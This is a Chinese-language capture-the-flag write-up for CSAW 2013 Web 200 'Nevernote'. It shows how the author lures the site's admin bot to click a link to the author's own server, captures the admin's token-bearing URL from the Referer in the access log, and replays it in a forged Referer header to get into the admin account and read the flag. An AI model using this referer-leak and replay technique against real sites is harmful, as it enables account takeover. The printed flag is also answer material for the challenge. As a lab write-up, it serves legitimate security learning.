CSAW CTF Qualification Round 2013 Web 200 Nevernote

0x00 题目

来自网站http://128.238.66.214的管理员Nevernote Admin[nevernoteadmin@nevernote.com][2]
发往邮箱[email protected]
时间:2013年9月19日 星期四 15:05
主题:求助

亲爱的小伙伴:
邪恶的黑客已经控制了我的Nevernote网站服务器并且锁定了我的管理帐户是我不能登入,我正在尝试恢复访问,你有没有办法登入我的帐户帮我把notes保存下来吗?虽说网站的安全性较高,但是对于你应该没有问题,我看好你,加油!
…………………………………………………………………………………………………………………………谢谢,Nevernote网站管理员

0x01 解题

访问网站后出现一个登陆界面:

CSAW CTF Qualification Round 2013 Web 200 Nevernote login.png

注册后登陆后,浏览网站所有页面后发现有两个基本功能:

1.可以在不同用户互发消息
2.用户可以进行笔记创建编辑等

最开始以为是针对这两个功能进行突破,不过搞了好久并没有什么收获,不过发现了一个值得注意的地方,不管进行什么操作,总会加上一堆长hash值且hash值一直不变,后来给了提示:Nevernote管理员会检查链接,于是便想到了。

我们通过发送消息的功能给admin发送一个链接(比如自己的博客地址),然后管理员就会收消息访问链接,于是我们查看博客的访问日志中的来源记录:

1
2
3
4
128.238.66.214 - - [21/Sep/2013:16:07:29 +0400] "GET / HTTP/1.1" 200 28060 "http://128.238.66.214
/viewmessage.php?enc=zhc5qxq0UHeCENSowZ4i83LOuwP2xOeusmD%2BMwnG5JGRoG7ROrUWg%2BhIAMgqJJqefNt15FII51eu1
op1W9yMjKq9Yrhn%2BkI0wt09sVMnqrMflOeyWwwb2MNBFxGPKRTM%2FSziEOtH1mZmVH%2Fh9Vu%2Bc3ipeAXjkFMpilOSpUPCD4Q
%3D" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

于是构造请求,在Header里加入:

1
2
3
Referer:http://128.238.66.214
/viewmessage.php?enc=zhc5qxq0UHeCENSowZ4i83LOuwP2xOeusmD%2BMwnG5JGRoG7ROrUWg%2BhIAMgqJJqefNt15FII51eu1
op1W9yMjKq9Yrhn%2BkI0wt09sVMnqrMflOeyWwwb2MNBFxGPKRTM%2FSziEOtH1mZmVH%2Fh9Vu%2Bc3ipeAXjkFMpilOSpUPCD4Q%3D

成功登入,然后看到key的note,打开得到flag:

CSAW CTF Qualification Round 2013 Web 200 Nevernote key.png

key{akjdsf98LolCats234lkas0!#@%[email protected]#250saDucati9dfL$Jdc09234lkjasf}